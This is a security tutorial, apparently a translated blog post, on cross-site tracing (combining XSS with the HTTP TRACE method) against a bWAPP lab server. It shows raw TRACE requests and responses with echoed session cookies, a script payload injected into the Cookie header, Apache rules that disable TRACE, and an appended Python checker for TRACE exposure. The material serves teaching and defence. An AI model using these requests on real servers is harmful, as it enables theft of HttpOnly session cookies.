Cross-Site Tracing Attack (CST/XST)


XSS and HttpOnly

Normally, client-side scripts (such as JavaScript) can read cookies through the document.cookie property, so if the site has an XSS vulnerability the cookie is easily stolen. Browsers provide a security policy for this: when a cookie is set with the HttpOnly attribute, client-side scripts cannot access it through document.cookie, so even with an XSS vulnerability the user's cookie cannot be stolen that way. In that situation the HTTP TRACE method can be used to obtain the user's cookie.

The TRACE method

What TRACE does: when a client sends a request, that request may pass through firewalls, proxies, gateways or other applications, and each intermediate node may modify the original HTTP request. The TRACE method lets the client see what the request looks like by the time it is finally delivered to the server.

Let's look at how the TRACE method works on a server that allows it.

Request:

TRACE http://10.20.40.95/bWAPP/bWAPP/xss_get.php?firstname=aaaa&lastname=aaa&form=submit HTTP/1.1
Host: 10.20.40.95
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://10.20.40.95/bWAPP/bWAPP/xss_get.php?firstname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=aa&form=submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: UM_distinctid=16d6147443356c-0f39aedf637785-67e1b3f-144000-16d61474434806; CNZZDATA1261218610=72836639-1569293821-%7C1569293821; PHPSESSID=jo1tq7ivnljqoknds138igko97; security_level=2


Response:

HTTP/1.1 200 OK
Date: Fri, 29 Nov 2019 11:32:59 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 819

TRACE /bWAPP/bWAPP/xss_get.php?firstname=aaaa&lastname=aaa&form=submit HTTP/1.1
Host: 10.20.40.95
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://10.20.40.95/bWAPP/bWAPP/xss_get.php?firstname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=aa&form=submit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: UM_distinctid=16d6147443356c-0f39aedf637785-67e1b3f-144000-16d61474434806; CNZZDATA1261218610=72836639-1569293821-%7C1569293821; PHPSESSID=jo1tq7ivnljqoknds138igko97; security_level=2


As you can see, the response body is the original request message; the browser also downloads a .php file whose contents are the original request message.

Vulnerability overview

When a server allows the TRACE method, a cross-site tracing attack may be possible. Cross-site tracing (CST/XST) is an attack that combines XSS with the HTTP TRACE feature.

Verifying the vulnerability

1. First, intercept the request with a proxy/packet-capture tool and change the request method together with any one field of the request. The example below uses the Cookie field and inserts XSS code into it:

TRACE http://10.20.40.95/bWAPP/bWAPP/xss_get.php?firstname=aaaa&lastname=aaa&form=submit HTTP/1.1
Host: 10.20.40.95
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <script>alert("TRACE XSS")</script>


2. In the response, change Content-Type: message/http to Content-Type: text/html:

HTTP/1.1 200 OK
Date: Fri, 29 Nov 2019 11:50:49 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 570

TRACE /bWAPP/bWAPP/xss_get.php?firstname=aaaa&lastname=aaa&form=submit HTTP/1.1
Host: 10.20.40.95
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <script>alert("TRACE XSS")</script>


After the request is sent, the page shows the alert popup.

Remediation

Apache:

On a virtual host, add the following to the .htaccess file to filter TRACE requests:

RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

Users with server access can add the following directive at the end of httpd.conf and then restart Apache:

TraceEnable off
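To confirm the fix took effect, here is an added example (not from the original post): a Python check that parses a raw HTTP reply and reports whether the server still honours TRACE, i.e. whether the XST precondition remains. The host name example.test and the sample replies are constructed for the offline check; probe_trace() is the live version for a host you administer.

```python
# Added example, not from the original post: decide from a raw HTTP reply
# whether the server honoured TRACE (the XST precondition), so the fix
# above can be verified. Sample replies below are constructed, not captured.
import http.client

def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.split(b"\r\n")
    status = int(status_line.split(b" ")[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return status, headers, body

def trace_enabled(raw: bytes) -> bool:
    """TRACE is live when the server answers 200 and echoes the request
    (message/http body starting with the request line). A 200 that carries
    an ordinary HTML page is not an echo; Apache with TraceEnable off
    answers 405 Method Not Allowed."""
    status, headers, body = parse_response(raw)
    is_echo = headers.get("content-type", "").startswith("message/http")
    return status == 200 and (is_echo or body.lstrip().startswith(b"TRACE "))

def probe_trace(host: str, port: int = 80, path: str = "/") -> bool:
    """Live check against a host you administer: send one TRACE carrying a
    marker cookie and classify the reply. Not called at import time."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("TRACE", path, headers={"Cookie": "xst_probe=1"})
    resp = conn.getresponse()
    raw = (f"HTTP/1.1 {resp.status} {resp.reason}\r\n".encode()
           + b"".join(f"{k}: {v}\r\n".encode() for k, v in resp.getheaders())
           + b"\r\n" + resp.read())
    conn.close()
    return trace_enabled(raw)

# Constructed replies: TRACE honoured, TRACE disabled, and a 200 that is
# not an echo (some frameworks serve their normal page for any method).
TRACE_ON = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: message/http\r\n"
            b"\r\nTRACE / HTTP/1.1\r\nHost: example.test\r\nCookie: PHPSESSID=x\r\n")
TRACE_OFF = (b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET,HEAD,POST\r\n"
             b"Content-Type: text/html\r\n\r\n<html>Method Not Allowed</html>")
PLAIN_200 = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
             b"<html>Welcome</html>")
```

Modern browsers refuse to issue TRACE from XMLHttpRequest and fetch, so the remaining exposure is from scripted clients and from the server-side echo itself; disabling TRACE on the server is still the fix, and a 405 from probe_trace() is the expected result afterwards.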
